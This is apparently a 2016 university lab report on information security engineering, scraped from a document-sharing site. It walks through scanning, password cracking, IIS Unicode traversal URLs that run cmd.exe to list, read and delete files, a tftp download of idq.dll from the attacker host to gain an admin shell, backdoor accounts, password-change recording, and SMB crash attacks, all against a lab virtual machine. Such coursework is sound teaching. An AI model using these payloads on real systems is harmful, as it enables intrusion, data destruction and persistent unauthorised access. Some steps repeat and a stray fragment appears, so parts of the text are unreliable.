信息安全工程实验报告.doc

上传人:wj 文档编号:1318538 上传时间:2023-04-30 格式:DOC 页数:66 大小:4.96MB
下载 相关 举报
信息安全工程实验报告.doc_第1页
第1页 / 共66页
信息安全工程实验报告.doc_第2页
第2页 / 共66页
信息安全工程实验报告.doc_第3页
第3页 / 共66页
信息安全工程实验报告.doc_第4页
第4页 / 共66页
信息安全工程实验报告.doc_第5页
第5页 / 共66页
信息安全工程实验报告.doc_第6页
第6页 / 共66页
信息安全工程实验报告.doc_第7页
第7页 / 共66页
信息安全工程实验报告.doc_第8页
第8页 / 共66页
信息安全工程实验报告.doc_第9页
第9页 / 共66页
信息安全工程实验报告.doc_第10页
第10页 / 共66页
信息安全工程实验报告.doc_第11页
第11页 / 共66页
信息安全工程实验报告.doc_第12页
第12页 / 共66页
信息安全工程实验报告.doc_第13页
第13页 / 共66页
信息安全工程实验报告.doc_第14页
第14页 / 共66页
信息安全工程实验报告.doc_第15页
第15页 / 共66页
信息安全工程实验报告.doc_第16页
第16页 / 共66页
信息安全工程实验报告.doc_第17页
第17页 / 共66页
信息安全工程实验报告.doc_第18页
第18页 / 共66页
信息安全工程实验报告.doc_第19页
第19页 / 共66页
信息安全工程实验报告.doc_第20页
第20页 / 共66页
亲,该文档总共66页,到这儿已超出免费预览范围,如果喜欢就下载吧!
下载资源
资源描述

信息安全工程实验报告.doc

《信息安全工程实验报告.doc》由会员分享,可在线阅读,更多相关《信息安全工程实验报告.doc(66页珍藏版)》请在冰点文库上搜索。

信息安全工程实验报告.doc

《信息安全工程》

中南大学

信息安全工程

实验报告

学生姓名

学院信息科学与工程学院

专业班级信息安全

完成时间2016年月日

目录

1.实验1 3

1.1实验内容 3

1.2实验过程 3

2.实验2 7

2.1实验内容 7

2.2实验过程 7

3.实验3 15

3.1实验内容 15

3.2实验过程 16

4.实验4 23

4.1实验内容 23

4.2实验背景 23

4.3实验过程 25

5.实验5 36

5.1实验内容 36

5.2实验过程 36

6.实验6 41

6.1实验内容 41

6.2实验过程 41

7.实验7 48

7.1实验内容 48

7.2实验背景 48

7.3实验过程 49

8.实验8 56

8.1实验内容 56

8.2实验背景 56

8.3实验过程 60

9.实验总结 66

信息安全工程

1.实验1

1.1实验内容

抓取ping和Telnet的数据报,并简要分析IP头的结构。

1.2实验过程

安装VMware并且打开已经配置好的虚拟机。

配置VMwre虚拟机:

为了使所有的网络安全攻击实验都可以成功完成,在虚拟上安装没有打过任何补丁的WindowsAdvancedServer2000。

启动成功后,进入操作系统,配置虚拟机上操作系统的IP地址,之前查询得到物理主机IP地址为192.168.1.3,使之和主机能够通过网络进行通信,配置虚拟机操作系统的IP地址应与物理主机在同一网段,实验设为:

192.168.1.43

利用Ping指令来测试网络是否连通。

在主机的DOS窗口中输入“Ping192.168.1.3”,ping通截图如下:

利用wireshark抓包:

Ping之前打开wireshark软件,点击开始抓包,找到主机间通信的数据包信息如下:

开启Telnet服务:

Telnet给用户提供了一种通过网络登录远程服务器的方式,通过端口23工作。

首先在虚拟机Telnet管理器中开启Telnet服务,在Telnet服务管理器中选择4,启动Telnet服务器。

如下图所示:

虚拟机上的Telnet服务器就启动了,然后在主机的DOS窗口中连接虚拟机的Telnet服务器,如下图:

连接Telnet服务器:

虚拟机上的Telnet服务器就启动了,然后在主机的DOS窗口中连接虚拟机的Telnet服务器,如下图:

2.实验2

2.1实验内容

共四个案例,包括四种扫描。

2.2实验过程

2.2.1案例一:

系统用户扫描

实验工具

可以使用工具软件:

GetNTUser,该工具可以在Winnt4以及Win2000操作系统上使用,主要功能包括:

(1)扫描出NT主机上存在的用户名。

(2)自动猜测空密码和与用户名相同的密码。

(3)可以使用指定密码字典猜测密码。

(4)可以使用指定字符来穷举猜测密码。

实验过程

1、对IP为172.18.25.109的计算机进行扫描,首先将该计算机添加到扫描列表中,选择菜单File下的菜单项“添加主机”,输入目标计算机的IP地址,如图所示。

2、在Windows7上利用GetNTUser工具扫描Windows2000上的用户,可以获得用户列表。

(此时Windows2000上的administrator没有密码。

3、更改Windows2000administrator的密码,并创建新用户xyz:

4、再次扫描结果:

5、设置字典文件:

利用该工具可以对计算机上用户进行密码破解,首先设置密码字典,设置完密码字典以后,将会用密码字典里的每一个密码对目标用户进行测试,如果用户的密码在密码字典中就可以得到该密码。

6、字典测试后,administrator的密码显示出来

2.2.2案例二:

开放端口扫描

实验工具

得到对方开放了哪些端口也是扫描的重要一步。

使用工具软件PortScan可以到得到对方计算机都开放了哪些端口。

实验过程

对192.168.86.128的计算机进行端口扫描,在Scan文本框中输入IP地址,点击按钮“START”,开始扫描,在CLEAR处显示端口开放情况。

2.2.3案例三:

共享目录扫描

实验工具

通过工具软件Shed来扫描对方主机,得到对方计算机提供了哪些目录共享。

实验过程

该软件可以扫描一个IP地址段的共享信息,这里只扫描IP为192.168.86.128的目录共享情况。

在起始IP框和终止IP框中都输入192.168.86.128,点击按钮“开始”就可以得到对方的共享目录了。

2.2.4案例四:

利用TCP协议实现端口扫描

实验原理

实现端口扫描的程序可以使用TCP协议和UDP协议,原理是利用Socket连接对方的计算机的某端口,试图和该端口建立连接。

如果建立成功,就说明对方开放了该端口,如果失败了,就说明对方没有开放该端口,具体实现程序proj4_4.cpp所示。

实验过程

1、在vc++中打开工程,编译,链接,在debug文件夹中形成一个EXE文件,将这个文件拷在c盘下,在控制台中运行这个文件,查看服务器ip的指定端口是否开启。

2、结果显示服务器的80端口开启,79端口关闭。

3.实验3

3.1实验内容

共四个案例:

1、使用工具软件X-Scan-v2.3进行漏洞扫描

2、网络监听的目的是截获通信的内容,监听的手段是对协议进行分析。

使用工具软件Snifferpro进行网络监听。

3、得到管理员密码,用户登录以后,所有的用户信息都存储在系统的一个进程中,这个进程是:

“winlogon.exe”,可以利用FindPass将当前登录用户的密码解码出来。

4、用普通用户帐号登录后,可以利用工具GetAdmin.exe将自己加到管理员组或者新建一个具有管理员权限的用户。

3.2实验过程

3.2.1漏洞扫描

扫描结果保存在/log/目录中,index_*.htm为扫描结果索引文件。

设置扫描参数:

利用该软件对系统存在的一些漏洞进行扫描,选择菜单栏设置下的菜单项“扫描参数”,扫描参数的设置如下图

下面需要确定要扫描主机的IP地址或者IP地址段,先将虚拟机IP改到和主机同一网段中去,本次实验改成192.169.1.70,选择菜单栏设置下的菜单项“扫描参数”,扫描一台主机,在指定IP范围框中输入:

192.169.1.70-192.168.1.70,

设置完毕后,进行漏洞扫描,点击工具栏上的图标“开始”,开始对目标主机进行扫描,扫描结果如下图:

3.2.2网络监听

WinSniffer专门用来截取局域网内的密码,比如登录FTP,登录Email等的密码。

安装好软件WinSniffer,打开其主界面如下图所示

设置:

只要做简单的设置就可以进行密码抓取了,点击工具栏图标“Adapter”,设置网卡,这里设置为本机的物理网卡就可以,

抓取密码:

在本机主机使用DOS命令行连接远程的FTP服务

会话过程:

打开WinSniffer,看到刚才的会话过程已经被记录下来了,显示了会话的一些基本信息,如下图:

3.2.3得到管理员密码

找到进程winlogon.exe

使用FindPass等工具可以对该进程进行解码,然后将当前用户的密码显示出来。

将FindPass.exe拷贝到C盘根目录,执行该程序,将得到当前用户得登录名,如下图:

3.2.4权限提升

利用Hacker帐户登录系统,在系统中执行程序GetAdmin.exe,程序自动读取所有用户列表,在对话框中点击按钮“New”,在框中输入要新建的管理员组的用户名,如下图:

输入一个用户名“IAMHacker”,点击按钮“确定”以后,然后点击主窗口的按钮“OK”,出现添加成功的窗口,如下图:

4.实验4

4.1实验内容

破解系统密码、邮件密码、word文档密码以及Unicode漏洞。

4.2实验背景

4.2.1暴力破解系统密码

l暴力攻击的一个具体例子是,一个黑客试图使用计算机和信息去破解一个密码:

一个黑客需要破解—段单一的被用非对称密钥加密的信息,为了破解这种算法,一个黑客需要求助于非常精密复杂的方法,它使用120个工作站,两个超级计算机利用从三个主要的研究中心获得的信息,即使拥有这种配备,它也将花掉八天的时间去破解加密算法,实际上破解加密过程八天已是非常短暂的时间了。

l一次字典攻击能否成功,很大因素上决定与字典文件。

一个好的字典文件可以高效快速的得到系统的密码。

攻击不同的公司、不通地域的计算机,可以根据公司管理员的姓氏以及家人的生日,可以作为字典文件的一部分,公司以及部门的简称一般也可以作为字典文件的一部分,这样可以大大的提高破解效率。

l一个字典文件本身就是一个标准的文本文件,其中的每一行就代表一个可能的密码。

目前有很多工具软件专门来创建字典文件。

l字典文件为暴力破解提供了一条捷径,程序首先通过扫描得到系统的用户,然后利用字典中每一个密码来登录系统,看是否成功,如果成功则将密码显示。

4.2.2Unicode漏洞

l通过打操作系统的补丁程序,就可以消除漏洞。

只要是针对漏洞进行攻击的案例都依赖于操作系统是否打了相关的补丁。

lUnicode漏洞是2000-10-17发布的,受影响的版本:

MicrosoftIIS5.0+MicrosoftWindows2000系列版本

MicrosoftIIS4.0+MicrosoftWindowsNT4.0

l消除该漏洞的方式是安装操作系统的补丁,只要安装了SP1以后,该漏洞就不存在了。

微软IIS4.0和5.0都存在利用扩展UNICODE字符取代"/"和"\"而能利用"../"目录遍历的漏洞。

4.2.3Unicode漏洞的检测方法

l使用扫描工具来检测Unicode漏洞是否存在,使用上一章介绍的X-Scan来对目标系统进行扫描,目标主机IP为:

192.168.86.128,Unicode漏洞属于IIS漏洞,所以这里只扫描IIS漏洞就可以了。

4.3实验过程

4.3.1案例一:

利用字典攻击破解密码。

4.3.2案例二:

暴力破解邮箱密码

邮箱的密码一般需要设置到八位以上,否则七位以下的密码容易被破解。

尤其七位全部是数字,更容易被破解。

破解电子邮箱密码,一个比较著名的工具软件是:

黑雨——POP3邮箱密码暴力破解器,比较稳定的版本是2.3.1,主界面如图所示。

4.3.3案例三:

破解Word文档密码

目前许多软件都具有加密的功能,比如Office文档、Winzip文档和Winrar文档等等。

这些文档密码可以有效的防止文档被他人使用和阅读。

但是如果密码位数不够长的话,同样容易被破解。

1.新建一个word文档

2.修改word文件权限密码

3.安装AdvancedOfficeXPPasswordRecovery工具

3.该密码是三位的,使用工具软件,AdvancedOfficeXPPasswordRecovery可以快速破解Word文档密码。

点击工具栏按钮“OpenFile”,打开刚才建立的Word文档,程序打开成功后会在LogWindow中显示成功打开的消息。

4.3.4案例四:

Unicode漏洞专题

1.检测Unicode漏洞是否存在

2.可以看出,存在许多系统的漏洞。

只要是/scripts开头的漏洞都是Unicode漏洞。

比如:

/scripts/..%c0%2f../winnt/system32/cmd.exe?

/c+dir

其中/scripts目录是IIS提供的可以执行命令的一个有执行程序权限的一个目录,在IIS中的位置如图所示。

3.scripts目录一般系统盘根目录下的Inetpub目录下,如图所示。

4.在Windows的目录结构中,可以使用两个点和一个斜线“../”来访问上一级目录,在浏览器中利用“scripts/../../”可以访问到系统盘根目录,访问“scripts/../../winnt/system32”就访问到系统的系统目录了,在system32目录下包含许多重要的系统文件,比如cmd.exe文件,可以利用该文件新建用户,删除文件等操作。

浏览器地址栏中禁用符号“../”,但是可以使用符号“/”的Unicode的编码。

比如“/scripts/..%c0%2f../winnt/system32/cmd.exe?

/c+dir”中的“%c0%2f”就是“/”的Unicode编码。

这条语句是执行dir命令列出目录结构。

5.此漏洞从中文IIS4.0+SP6开始,还影响中文WIN2000+IIS5.0、中文WIN2000+IIS5.0+SP1,台湾繁体中文也同样存在这样的漏洞。

在NT4中/编码为“%c1%9c”或者“%c1%9c”,WIN2000英文版是“%c0%af”。

但从国外某些站点得来的资料显示,还有以下的编码可以实现对该漏洞的检测,该编码存在于日文版、韩文版等操作系统。

%c1%pc

%c0%9v

%c0%qf

%c1%8s

%e0%80%af

利用该漏洞读取出计算机上目录列表,比如读取C盘的目录,只要在浏览器中输入

“http:

//192.168.86.128%c0%2f../winnt/system32/cmd.exe?

/c+dir+c:

\”

6.利用语句得到对方计算机上装了几个操作系统以及操作系统的类型,只要读取C盘下的boot.ini文件就可以了。

使用的语句是:

http:

//192.168.86.128/scripts/..%c0%2f../winnt/system32/cmd.exe?

/c+type+c:

\boot.ini

7.利用Unicode漏洞删除主页

利用Unicode可以方便的更改对方的主页,比如现在已经知道对方网站的根路径在“C:

\Initpub\wwwroot”(系统默认)下,可以删除该路径下的文件“default.asp”来删除主页,这里的“default.asp”文件是IIS的默认启动页面。

使用的语句是:

http:

//192.168.86.128/scripts/..%c0%2f../winnt/system32/cmd.exe?

/c+del+c:

\inetpub\wwwroot\default.asp

8.利用Unicode漏洞删除主页

利用Unicode可以方便的更改对方的主页,比如现在已经知道对方网站的根路径在“C:

\Initpub\wwwroot”(系统默认)下,可以删除该路径下的文件“default.asp”来删除主页,这里的“default.asp”文件是IIS的默认启动页面。

使用的语句是:

http:

//192.168.86.128/scripts/..%c0%2f../winnt/system32/cmd.exe?

/c+del+c:

\inetpub\wwwroot\default.asp

9.拷贝文件

为了使用方便,利用语句将cmd.exe文件拷贝到scripts目录,并改名为c.exe,使用的语句是:

http:

//192.168.86.128/scripts/..%c0%2f../winnt/system32/cmd.exe?

/c+copy+C:

\winnt\system32\cmd.exe+c.exe

地址,点击按钮“START”,开始扫描,在CLEAR处显示端口开放情况。

5.实验5

5.1实验内容

入侵攻击实验。

5.2实验过程

5.2.1案例一:

利用Unicode漏洞入侵系统

1.上载文件:

在地址栏上执行命令,用户的权限比较低,像net等系统管理指令不能执行。

利用Unicode可以入侵对方的系统,并得到管理员权限。

首先需要向对方服务器上传一个名为“idq.dll”的文件。

入侵的第一步,建立tftp服务器,向对方的scripts文件夹传几个文件。

普通文件传输协议TFTP(TextFileTransmissionProtocol)一般用来传输单个文件。

使用工具软件tftpd32.exe建立服务器。

将idq.dll和tftpd32.exe放在本地的同一目录下,执行tftpd32.exe程序,主界面如图所示:

这样在本地的TFTP的服务器就建立好了,保留这个窗口,通过该服务器向对方传递idq.dll文件。

在浏览器中执行命令:

“http:

//192.168.86.128/scripts/..%c0%2f../winnt/system32/cmd.exe?

/c+tftp+-i+192.168.191.1+get+idq.dll”

命令其实是“tftp–i192.168.191.1getidq.dll”意思是从192.168.191.1服务器上获取idq.dll文件,执行成功的界面如图所示:

2.查看scripts目录

上传完毕后可以查看一下scripts目录,是否真的上传成功了。

如图所示:

3.入侵对方主机

说明已经成功的在scripts目录中上传了一个idq.dll文件,下面使用工具软件ispc.exe入侵对方系统。

拷贝ispc.exe文件到本地计算机的C盘根目录,在DOS命令行下执行命令:

“ispc.exe192.168.86.128/scripts/idq.dll”,连接成功后就直接进入了对方的DOS命令行下,而且具有管理员权限,入侵的过程所示:

4.建立用户

可以在对方计算机上做管理员可以做的一切事情,比如添加用户,建立一个用户名为“Hacker123”,密码也是“Hacker123”的用户,如图所示:

5.2.2案例二:

利用打印漏洞攻击

利用打印漏洞可以在目标的计算机上添加一个具有管理员权限的用户。

经过测试,该漏洞在SP2、SP3以及SP4版本上仍存在,但不能保证100%入侵成功。

使用工具软件:

cniis.exe,使用的语法格式是:

“cniis192.168.86.1280”,第一个参数是目标的IP地址,第二参数是目标操作系统的补丁号,因为192.168.86.128没有打补丁,这里就是0。

拷贝cniis.exe文件到C盘根目录,执行程序如图所示:

5.2.3案例三:

SMB致命攻击

SMB(SessionMessageBlock,会话消息块协议)又叫做NetBIOS或LanManager协议,用于不同计算机之间文件、打印机、串口和通讯的共享和用于Windows平台上提供磁盘和打印机的共享。

利用该协议可以进行各方面的攻击,比如可以抓取其他用户访问自己计算机共享目录的SMB会话包,然后利用SMB会话包登录对方的计算机。

还可以利用SMB协议让对方操作系统系统重新启动或者蓝屏。

使用的工具软件是:

SMBDieV1.0,该软件对打了SP3、SP4的计算机依然有效,必须打专门的SMB补丁。

攻击的时候,需要两个参数:

对方的IP地址和对方的机器名,窗口中分别输入这两项,软件的主界面如图所示:

6.实验6

6.1实验内容

网络服务实验:

远程启动Telnet服务,获得管理员密码和建立web和Telnet服务。

6.2实验过程

6.2.1案例一:

远程启动Telnet服务

1.远程开启对方的Telnet服务

利用工具RTCS.vbe可以远程开启对方的Telnet服务,使用该工具需要知道对方具有管理员权限的用户名和密码。

设置管理员密码(123456):

2.在主机上远程登录虚拟机,命令的语法是:

“cscriptRTCS.vbe192.168.86.128administrator123456123”

开启远程主机Telnet服务的过程如图:

3.确认对话框

在DOS提示符下,登录目标主机的Telnet服务,首先输入命令“Telnet192.168.86.128”,因为Telnet的用户名和密码是明文传递的,首先出现确认发送信息对话框。

如图所示:

4.登录Telnet的用户名和密码

输入字符“y”,进入Telnet的登录界面,需要输入主机的用户名和密码,如图所示:

6.2.2案例二:

记录管理员口令修改过程

当入侵到对方主机并得到管理员口令以后,就可以对主机进行长久入侵了,但是一个好的管理员一般每隔半个月左右就会修改一次密码,这样已经得到的密码就不起作用了。

利用工具软件Win2kPass.exe记录修改的新密码,该软件将密码记录在Winnt\temp目录下的Config.ini文件中

该工具软件是有“自杀”的功能,就是当执行完毕后,自动删除自己。

首先在对方操作系统中执行Win2KPass.exe文件,当对方主机管理员密码修改并重启计算机以后,就在Winnt\temp目录下产生一个ini文件,如图所示:

6.2.3案例三:

建立Web服务和Telnet服务

使用工具软件wnc.exe可以在对方的主机上开启两个服务:

Web服务和Telnet服务。

其中Web服务的端口是808,Telnet服务的端口是707。

执行很简单,只要在对方的命令行下执行一下wnc.exe就可以,如图所示:

执行完,利用命令“netstat-an”查看开启的808和707端口,如图所示:

1.测试Web服务

首先测试Web服务808端口,在浏览器地址栏中输入“http:

//192.168.86.128:

808”,出现主机的盘符列表,如图所示:

2.看密码修改记录文件

可以下载对方硬盘设置光盘上的任意文件,可以到目录下查看对方密码修改记录文件。

3.利用telnet命令连接707端口

输入命令:

“telnet192.168.86.128707”。

4.登录到对方的命令行

无需任何用户名和密码即可登陆,如图所示:

7.实验7

7.1实验内容

常见的简单木马有NetBus远程控制、“冰河”木马、PCAnyWhere远程控制等等。

这里介绍一种最常见的木马程序:

“冰河”。

使用“冰河”进行远程控制。

7.2实验背景

7.2.1木马

l木马是一种可以驻留在对方系统中的一种程序。

l木马一般由两部分组成:

服务器

展开阅读全文
相关资源
猜你喜欢
相关搜索
资源标签

当前位置:首页 > 外语学习 > 日语学习

copyright@ 2008-2023 冰点文库 网站版权所有

经营许可证编号:鄂ICP备19020893号-2